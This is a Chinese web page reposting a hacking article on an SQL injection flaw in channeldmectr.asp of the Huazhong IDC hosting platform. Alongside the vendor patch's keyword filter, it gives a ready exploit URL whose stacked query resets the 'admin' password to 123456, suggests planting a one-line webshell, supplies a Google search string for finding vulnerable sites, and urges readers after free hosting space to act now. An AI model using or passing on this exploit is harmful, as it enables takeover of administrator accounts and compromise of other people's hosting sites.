-
客服电话
-
APP下载
迪恩网络APP
随时随地掌握行业动态
-
官方微信
扫描二维码
关注迪恩网络微信公众号
客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数. 正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码: 复制代码 代码如下:Function SafeRequest(ParaName) Dim ParaValue ParaValue=Request(ParaName) if IsNumeric(ParaValue) then SafeRequest=ParaValue exit Function else ParaValuetemp=lcase(ParaValue) tempvalue="select|insert|delete|union| join|script|applet|object|’|drop|update|truncate| create|xp_cmdshell|exec|alter|cast|rename|modify” temps=split(tempvalue,”|”) for mycount=0 to ubound(temps) if Instr(ParaValuetemp,temps(mycount)) > 0 and lcase(ParaName)<>”module” then call errorpage(-2,”您提交的内容包含了字符["&temps(mycount)&"],请去除后重新提交或联系我们…”) response.end end if next SafeRequest=ParaValue end if End function 代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句. 利用方法如下: http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}– 下面给出一个示范语句: http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’– 语句的意思是将管理员账号admin的密码改为123456. 当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略. 最后丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..转自www.hacksb.cn 我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载. OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了.. 补丁下载地址 (本文为普瑞斯特编辑整理) http://www.hacksb.cn |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
六六分期app的软件客服如何联系?不知道吗?加qq群【895510560】即可!标题:六六分期
今天小编告诉大家如何处理win10系统火狐flash插件总是崩溃的问题,可能很多用户都不知
今天小编告诉大家如何对win10系统删除桌面回收站图标进行设置,可能很多用户都不知道
今天小编告诉大家如何对win10系统电脑设置节能降温的设置方法,想必大家都遇到过需要
我们在使用xp系统的过程中,经常需要对xp系统无线网络安装向导设置进行设置,可能很多
今天小编告诉大家如何处理win7系统玩cf老是与主机连接不稳定的问题,可能很多用户都不
电脑对日常生活的重要性小编就不多说了,可是一旦碰到win7系统设置cf烟雾头的问题,很
我们在日常使用电脑的时候,有的小伙伴们可能在打开应用的时候会遇见提示应用程序无法
今天小编告诉大家如何对win7系统打开vcf文件进行设置,可能很多用户都不知道怎么对win
今天小编告诉大家如何对win10系统s4开启USB调试模式进行设置,可能很多用户都不知道怎
请发表评论